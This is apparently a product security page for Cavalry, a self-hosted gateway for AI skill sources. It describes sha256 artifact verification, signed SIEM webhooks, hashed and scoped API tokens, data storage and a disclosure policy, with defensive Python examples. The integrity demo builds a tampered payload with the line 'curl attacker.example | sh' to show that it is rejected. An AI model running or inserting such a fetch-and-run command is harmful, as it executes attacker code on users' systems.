Security

Security is operational, not a PDF.

Cavalry is the single enforcement point between your engineers and every public or private skill source. Here is the posture that ships with the product, plus the channel for reporting issues.

01 · Integrity

Every artifact is content-addressed.

Skills resolve by the sha256 of the artifact, not by a mutable tag. The CLI hashes the stream as it arrives and checks the digest on install; a mismatch fails closed, so no unverified bytes ever land in the workspace.

  • sha256 resolution end to end
  • Streaming verification on install
  • Append-only audit on every fetch
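The install-time check described above, as an added example that is not Cavalry's CLI source: the artifact is streamed into a temp file in the destination directory, hashed as it arrives, and only renamed into place once the digest matches, so a mismatch leaves nothing under the final name. The function names, chunk size cap and sample payload are this example's own assumptions.

```python
"""Fail-closed streaming verification of a content-addressed artifact.

Added example, not Cavalry's CLI code. It assumes the resolver hands the client
an expected sha256 hex digest alongside a byte stream; function names, the size
cap and the temp-file layout are this example's own choices.
"""
import hashlib
import os
import tempfile
from typing import Iterable


class IntegrityError(Exception):
    """Raised when the streamed bytes do not hash to the expected digest."""


def install_verified(chunks: Iterable[bytes], expected_sha256: str,
                     dest_path: str, size_limit: int = 64 * 1024 * 1024) -> str:
    """Stream `chunks` to `dest_path`, but only if they hash to `expected_sha256`.

    Bytes go to a temp file in the destination directory and are hashed as they
    arrive. The file is moved into place (atomic rename) only after the digest
    matches; on mismatch or an over-size stream the temp file is removed and
    nothing with the final name ever exists, so a half-verified artifact cannot
    be picked up by a file watcher or a retry.
    """
    expected = expected_sha256.lower()
    if len(expected) != 64 or any(c not in "0123456789abcdef" for c in expected):
        raise ValueError("expected_sha256 must be a 64-char hex digest")

    dest_dir = os.path.dirname(os.path.abspath(dest_path))
    os.makedirs(dest_dir, exist_ok=True)
    digest = hashlib.sha256()
    total = 0
    fd, tmp_path = tempfile.mkstemp(prefix=".partial-", dir=dest_dir)
    try:
        with os.fdopen(fd, "wb") as tmp:
            for chunk in chunks:
                total += len(chunk)
                if total > size_limit:
                    raise IntegrityError("stream exceeded size limit")
                digest.update(chunk)
                tmp.write(chunk)
            tmp.flush()
            os.fsync(tmp.fileno())
        actual = digest.hexdigest()
        if actual != expected:
            raise IntegrityError(f"sha256 mismatch: expected {expected}, got {actual}")
        os.replace(tmp_path, dest_path)  # all or nothing: rename is atomic
        return actual
    finally:
        if os.path.exists(tmp_path):  # still present only on the failure paths
            os.unlink(tmp_path)


def run_install_demo() -> dict:
    """Constructed demo: a genuine stream installs; a tampered stream is refused
    and leaves no file (partial or final) behind."""
    payload = b"#!/bin/sh\necho constructed skill artifact\n"  # constructed sample
    expected = hashlib.sha256(payload).hexdigest()
    with tempfile.TemporaryDirectory() as workspace:
        good = os.path.join(workspace, "skill.sh")
        installed = install_verified([payload[:10], payload[10:]], expected, good) == expected
        with open(good, "rb") as f:
            content_ok = f.read() == payload

        bad = os.path.join(workspace, "evil.sh")
        tampered = payload + b"curl attacker.example | sh\n"  # constructed tamper
        try:
            install_verified([tampered], expected, bad)
            rejected = False
        except IntegrityError:
            rejected = True
        leftovers = [n for n in os.listdir(workspace) if n != "skill.sh"]
    return {"installed": installed and content_ok,
            "tampered_rejected": rejected,
            "workspace_clean": leftovers == []}


if __name__ == "__main__":
    print(run_install_demo())
```

The rename is the fail-closed step: a watcher or a second install run sees either the fully verified file or nothing, never a partially written one.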

02 · Identity

Actor identity is preserved, row by row.

Every governed event records the user, the token, and the system context it came from. API tokens are scoped to a workspace and skill namespace, so a leaked token grants nothing outside the workspace and namespace it was minted for.

  • User · token · system on each row
  • Workspace-scoped API tokens
  • Signed webhook delivery to your SIEM
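The page states that webhook deliveries to your SIEM are signed but not which scheme is used. The following is an added example, not Cavalry's delivery code, showing one standard construction: an HMAC-SHA256 over "<timestamp>.<body>" carried in a header, so the receiver can reject forged bodies, wrong keys and replayed deliveries. The header name, replay tolerance, secret and sample audit event are this example's own assumptions.

```python
"""Signed webhook delivery and receiver-side verification.

Added example, not Cavalry's code. Shows a timestamped HMAC-SHA256 scheme for
signing an audit event on the way to a SIEM and verifying it on arrival.
Header name, tolerance window and the sample event are assumptions.
"""
import hashlib
import hmac
import json
import time
from typing import Optional

SIGNATURE_HEADER = "X-Cavalry-Signature"  # assumed header name
REPLAY_TOLERANCE = 300                     # seconds; assumed window


def _mac(secret: bytes, body: bytes, ts: int) -> str:
    # Bind the timestamp into the MAC so an old signature can't be re-sent
    # with a fresh "t=" value.
    return hmac.new(secret, f"{ts}.".encode() + body, hashlib.sha256).hexdigest()


def sign_delivery(secret: bytes, body: bytes, ts: Optional[int] = None) -> str:
    """Sender side: return the header value for `body` sent at time `ts`."""
    ts = int(time.time()) if ts is None else ts
    return f"t={ts},v1={_mac(secret, body, ts)}"


def verify_delivery(secret: bytes, body: bytes, header: str,
                    now: Optional[int] = None) -> bool:
    """Receiver side: True only for a well-formed, fresh, correctly signed body.

    `body` must be the raw request bytes; re-serialising parsed JSON would
    change whitespace or key order and break the MAC.
    """
    now = int(time.time()) if now is None else now
    fields = {}
    for part in header.split(","):
        key, sep, value = part.strip().partition("=")
        if sep:
            fields[key] = value
    try:
        ts = int(fields["t"])
        presented = fields["v1"]
    except (KeyError, ValueError):
        return False
    if abs(now - ts) > REPLAY_TOLERANCE:
        return False  # stale or far-future: treat as replay
    expected = _mac(secret, body, ts)
    # Constant-time compare; encode so a non-ASCII header can't raise TypeError.
    return hmac.compare_digest(expected.encode(), presented.encode())


def run_webhook_demo() -> dict:
    """Constructed demo: one genuine delivery and four ways it can go wrong."""
    secret = b"whsec_constructed_example_secret"  # constructed, not a real key
    event = {  # constructed sample of a governed audit row
        "event": "skill.fetch",
        "user": "alice",
        "token": "cav_1a2b3c",
        "system": "cli/1.4",
        "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
    }
    body = json.dumps(event, separators=(",", ":")).encode()
    ts = 1_700_000_000
    header = sign_delivery(secret, body, ts)
    tampered = body.replace(b'"alice"', b'"mallory"')
    return {
        "genuine": verify_delivery(secret, body, header, now=ts + 5),
        "tampered_body": verify_delivery(secret, tampered, header, now=ts + 5),
        "replayed": verify_delivery(secret, body, header, now=ts + REPLAY_TOLERANCE + 1),
        "wrong_secret": verify_delivery(b"other", body, header, now=ts + 5),
        "malformed": verify_delivery(secret, body, "v1=deadbeef", now=ts),
    }


if __name__ == "__main__":
    print(run_webhook_demo())
```

On the SIEM side, verify over the raw request body before any JSON parsing, and keep the tolerance short: it is the only thing bounding how long a captured delivery stays replayable.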

03 · Isolation

Runs in your VPC, on your Postgres.

Apache-licensed, Helm chart included, nothing phoned home. S3-compatible object storage for artifacts, Postgres as the primary store, Redis optional for rate limits.

  • Self-host by default
  • No vendor phone-home
  • Bring your own Postgres · S3 · KMS

04 · Posture

Compliance tracks the product, not the reverse.

SOC 2 Type I is in flight for the managed tier. Self-hosted deploys inherit your environment's controls; Cavalry publishes the mapping.

  • SOC 2 Type I · in progress · 2026 Q3
  • Data residency: you pick the region
  • Apache 2.0 source · third-party audit welcome

Data model

What Cavalry stores, where it stores it.

The gateway holds policy, audit, and skill metadata. Artifacts live in object storage you control. Nothing else.

Data at rest
Postgres, encrypted at rest by the storage layer you provide. Artifacts in S3-compatible object storage with server-side encryption.
Data in transit
TLS 1.2+ terminates at your ingress. Traffic from the gateway to the database is governed by your VPC policies; if you need encryption past the ingress, enable TLS on the Postgres connection itself rather than relying on network isolation alone.
Secrets
API tokens are stored hashed (argon2). Upstream registry credentials live in the secret backend you configure — not in the database.
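A token store of the shape the Identity section and the line above describe, as an added example that is not Cavalry's implementation: tokens carry a public id for lookup and a secret part that is stored only as a salted hash, and each stored row pins the workspace and namespace the token may act in. The page says argon2; hashlib.scrypt stands in here only because it ships with the Python standard library (argon2-cffi's PasswordHasher is the drop-in for the real thing). The token format, field names and sample workspaces are this example's own assumptions.

```python
"""Hashed, workspace-scoped API tokens.

Added example, not Cavalry's token store. Demonstrates: a public token id used
for the database lookup, a secret part that exists in the database only as a
salted hash, constant-time verification, and scope enforcement on every check.
scrypt stands in for the page's argon2 because it is in the standard library.
Token format ("cav_<id>_<secret>") and the KDF parameters are assumptions.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict

SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1, dklen=32)  # assumed cost settings
_DUMMY_SALT = b"\x00" * 16


@dataclass(frozen=True)
class StoredToken:
    salt: bytes       # per-token salt (argon2 embeds this in its encoded hash)
    digest: bytes     # KDF output; the plaintext secret is never stored
    workspace: str    # scope the token was minted for
    namespace: str    # skill namespace the token may touch


class TokenStore:
    def __init__(self) -> None:
        self._rows: Dict[str, StoredToken] = {}  # keyed by public token id

    @staticmethod
    def _hash(secret: str, salt: bytes) -> bytes:
        return hashlib.scrypt(secret.encode(), salt=salt, **SCRYPT_PARAMS)

    def mint(self, workspace: str, namespace: str) -> str:
        """Create a token; the plaintext is returned once and never kept."""
        token_id = secrets.token_hex(6)      # public lookup key, not secret
        secret = secrets.token_urlsafe(32)   # 256 bits of entropy
        salt = secrets.token_bytes(16)
        self._rows[token_id] = StoredToken(salt, self._hash(secret, salt),
                                           workspace, namespace)
        return f"cav_{token_id}_{secret}"

    def authorize(self, presented: str, workspace: str, namespace: str) -> bool:
        """True only if the token is genuine AND scoped to this workspace/namespace."""
        try:
            prefix, token_id, secret = presented.split("_", 2)
        except ValueError:
            return False
        row = self._rows.get(token_id) if prefix == "cav" else None
        if row is None:
            # Run the KDF anyway so an unknown id costs the same as a wrong secret.
            self._hash(secret, _DUMMY_SALT)
            return False
        if not hmac.compare_digest(self._hash(secret, row.salt), row.digest):
            return False
        # Scope check happens after authentication: a valid token for ws-a is
        # still refused for ws-b, which is what "cannot escalate laterally" means.
        return row.workspace == workspace and row.namespace == namespace

    def plaintext_leaked(self, presented: str) -> bool:
        """Would a dump of the rows reveal this token's secret part?"""
        secret = presented.split("_", 2)[-1].encode()
        return any(secret in r.digest or secret in r.salt for r in self._rows.values())


def run_token_demo() -> dict:
    """Constructed demo over two workspaces."""
    store = TokenStore()
    tok = store.mint("ws-alpha", "skills/public")      # constructed scope
    store.mint("ws-beta", "skills/public")              # a neighbour's token
    stripped = tok[:-3]                                 # simulated partial leak
    return {
        "own_scope": store.authorize(tok, "ws-alpha", "skills/public"),
        "other_workspace": store.authorize(tok, "ws-beta", "skills/public"),
        "other_namespace": store.authorize(tok, "ws-alpha", "skills/private"),
        "wrong_secret": store.authorize(stripped, "ws-alpha", "skills/public"),
        "garbage": store.authorize("not-a-token", "ws-alpha", "skills/public"),
        "plaintext_in_db": store.plaintext_leaked(tok),
    }


if __name__ == "__main__":
    print(run_token_demo())
```

The split between a public id and a hashed secret is what makes a salted, memory-hard hash usable at all: the row is found by the id, and only then is the expensive KDF run once against that row's salt.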
Retention
Audit rows are append-only. Soft-delete does not apply. Retention windows are configurable per org; the default is indefinite.

Reporting

Found something? Tell us first.

Report to security@cavalry.sh with repro steps and impact. A human replies within one business day; a fix or mitigation plan follows within seven.

Disclosure window
90 days from triage · extensions by agreement
Safe harbor
Good-faith reports get public credit, no takedown threats
Out of scope
DoS, social engineering, physical attacks, third-party SaaS